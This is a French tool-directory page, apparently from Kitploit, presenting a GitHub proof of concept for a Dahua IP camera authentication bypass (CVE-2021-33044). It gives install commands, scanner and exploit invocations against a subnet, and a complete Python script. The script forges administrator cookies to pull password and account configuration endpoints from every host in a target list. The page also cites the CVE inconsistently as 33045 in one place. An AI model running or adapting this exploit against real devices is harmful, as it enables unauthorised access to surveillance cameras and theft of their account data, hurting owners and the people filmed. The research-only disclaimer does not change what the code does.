Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Camera-Dahua-Research-l-h-ng-CVE-2021-33044 — # DAHUA_AUTH-BYPASS-CVE-2021-33044 | Kitploit
Outils/GitHubGitHub/litndat/camera-dahua-research-l-h-ng-cve-2021-33044
Authentification et AutorisationSécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHub
litndat/camera-dahua-research-l-h-ng-cve-2021-33044

Camera-Dahua-Research-l-h-ng-CVE-2021-33044

# DAHUA_AUTH-BYPASS-CVE-2021-33044

Voir le dépôt
9il y a 2 moisPas encore vérifié
Partager

Simulation d'exploitation du PoC de contournement d'authentification Dahua (CVE-2021-33044)

Aperçu

Les caméras IP Dahua sont des dispositifs IoT couramment utilisés dans les systèmes de surveillance de sécurité. En raison de leur déploiement fréquent sur les réseaux internes ou de leur accès depuis Internet, les vulnérabilités de sécurité des caméras IP peuvent gravement nuire à la vie privée et à la sécurité des informations.

CVE-2021-33045 est une vulnérabilité de sécurité affectant certaines gammes de caméras Dahua, permettant un accès non autorisé aux ressources de configuration internes sans authentification valide. Cette vulnérabilité provient d'un mécanisme de contrôle d'accès insuffisamment strict dans le firmware de l'appareil.

Informations sur la vulnérabilité

ChampDétail
CVECVE-2021-33044
TypeAuthentication Bypass
SévéritéCritique (CVSS ~9.8)
AuthAucune authentification requise
ImpactCaméras Dahua / DVR / NVR

Cause

La vulnérabilité provient d'une conception d'authentification non sécurisée dans le firmware des caméras Dahua :

  • Le serveur ne vérifie pas correctement la session / le jeton
  • Il fait confiance aux données envoyées par le client
  • Certains endpoints de configuration sensibles ne vérifient que l'existence du cookie, sans contrôler les droits d'accès réels

Cela permet à un attaquant :

  • de falsifier le processus d'authentification
  • de contourner entièrement la connexion

Références :

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Fonctionnement du mécanisme de contournement de l'authentification

Flux normal

root@kitploit:~
→ Le client envoie une requête HTTP avec un cookie arbitraire
→ La caméra vérifie le cookie au niveau de l'interface
→ Aucune session valide n'est vérifiée côté backend
→ Accès direct autorisé aux endpoints de configuration internes
→ Renvoi de données sensibles

Scénario

Utilisation

Installation

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Scan réseau

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Ports Dahua courants : 80,443, 8080, 37777, 37778

Exploitation de la vulnérabilité CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Contournement de l'authentification

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Exemple

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Explication

  • Le script utilise la bibliothèque requests et désactive volontairement les avertissements SSL.

  • La fonction dump_accounts(ip, port=80) est la fonction principale chargée de vérifier un appareil caméra. Ses fonctions principales consistent à :

    • Construire l'URL à partir de l'adresse IP et du port
    • Simuler un état de connexion administrateur via des cookies
    • Envoyer des requêtes aux endpoints de configuration sensibles
    • Analyser les réponses pour déterminer si l'appareil est affecté ou non
  • Simulation des cookies d'authentification. La fonction utilise des valeurs de cookie telles que :

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • Sur les versions de caméras affectées, le backend ne vérifie pas le sessionID réel, ce qui amène le système à croire que la requête provient d'un compte administrateur valide.

Boucle de traitement de la liste des cibles

Le script lit la liste des cibles depuis le fichier d'entrée et appelle la fonction de vérification pour chaque appareil. Cette approche permet d'évaluer plusieurs caméras automatiquement.

image

Processus de développement

Ces scripts ont été développés sur la base de :

  • Détails du CVE publiés par la NVD
  • Avis de sécurité de Dahua
  • Références PoC publiques (seclists.org, packetstormsecurity)

État des tests :

  • La logique de contournement de l'authentification est implémentée conformément aux spécifications du CVE
  • Tests limités sur des appareils vulnérables.

Remarque

Ce projet :

  • Est réservé à des fins d'apprentissage et de recherche
  • Doit être exécuté dans un environnement de laboratoire personnel
Télécharger l’outil
FichierObjectifCVEs
dahua_scanner.pyDécouverte réseau — recherche les caméras Dahua sur le sous-réseauDétection
dahua_exploit.pyOutil de scan Multi-CVE — vérifie toutes les vulnérabilités de sécurité.Toutes
dahua_auth_bypass.pyContournement d'authentification dédié avec l'option --dumpCVE-2021-33044